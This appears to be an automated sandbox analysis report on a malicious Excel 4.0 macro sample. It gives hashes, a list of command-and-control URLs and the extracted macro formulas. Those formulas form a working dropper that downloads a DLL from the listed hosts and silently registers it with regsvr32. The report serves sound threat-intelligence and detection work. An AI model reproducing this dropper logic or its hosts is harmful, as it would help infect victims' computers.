
General

  Target   bcd542295e496a568e2c670b64ad54451aea620d96d41b420157005a21fc5c65
  Size     20KB
  Sample   241111-zxhbvawgrh
  MD5      c2da44006be8967f01e1748cf703d093
  SHA1     d19d3968031d1238a1b2a6584c6358b132f51fc5
  SHA256   bcd542295e496a568e2c670b64ad54451aea620d96d41b420157005a21fc5c65
  SHA512   721c894c721f266fad34eea7345cd3c4a4c7cd9a0a1bb63f9308c451713d032b4544035ac0c8dccbf058d0062fd1cfc9de2951adb5bbf2bc14b5e8617bcdb1ee
  SSDEEP   384:eJaVb1GNjImo4CGzPd6ZIwwSKb5CzgObff9kC+xbX7Fg7a:kiIN3o4FLTCBn9kC+xbLF1

Score: 10/10

Malware Config

Extracted

  Rule: Excel 4.0 XLM Macro

  C2:
    https://banrai.ac.th/website/IHI0iNLLWDh9P/
    http://bangsoe.dk/__backup/JON6L/
    http://bahr.se/tvillingar2-filer/0wFIrmZ70Vl/
    https://barkstage.es/wp-content/S0Q/
    https://aquinoabogados.com.ar/newsletter/Zm7prnrQ55D1hrHqDC/
    http://ceibadiseno.com.mx/bandermex2/6a6wGJmNwx8/
    https://www.manchesterot.co.uk/about-us/LFXAJJIa/

  Attributes:
    formulas (one XLM 4.0 macro formula per line, as extracted from the sample):

      =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://banrai.ac.th/website/IHI0iNLLWDh9P/","..\kytk.dll",0,0)
      =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bangsoe.dk/__backup/JON6L/","..\kytk.dll",0,0))
      =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bahr.se/tvillingar2-filer/0wFIrmZ70Vl/","..\kytk.dll",0,0))
      =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://barkstage.es/wp-content/S0Q/","..\kytk.dll",0,0))
      =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://aquinoabogados.com.ar/newsletter/Zm7prnrQ55D1hrHqDC/","..\kytk.dll",0,0))
      =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ceibadiseno.com.mx/bandermex2/6a6wGJmNwx8/","..\kytk.dll",0,0))
      =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.manchesterot.co.uk/about-us/LFXAJJIa/","..\kytk.dll",0,0))
      =IF('SCWVCV'!D26<0,CLOSE(0),)
      =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll")
      =RETURN()

Extracted

  Language   Source          URL
  xlm4.0     xlm40.dropper   https://banrai.ac.th/website/IHI0iNLLWDh9P/
  xlm4.0     xlm40.dropper   http://bangsoe.dk/__backup/JON6L/
  xlm4.0     xlm40.dropper   http://bahr.se/tvillingar2-filer/0wFIrmZ70Vl/
  xlm4.0     xlm40.dropper   https://barkstage.es/wp-content/S0Q/
  xlm4.0     xlm40.dropper   https://aquinoabogados.com.ar/newsletter/Zm7prnrQ55D1hrHqDC/
  xlm4.0     xlm40.dropper   http://ceibadiseno.com.mx/bandermex2/6a6wGJmNwx8/
  xlm4.0     xlm40.dropper   https://www.manchesterot.co.uk/about-us/LFXAJJIa/


MITRE ATT&CK Enterprise v15

Tasks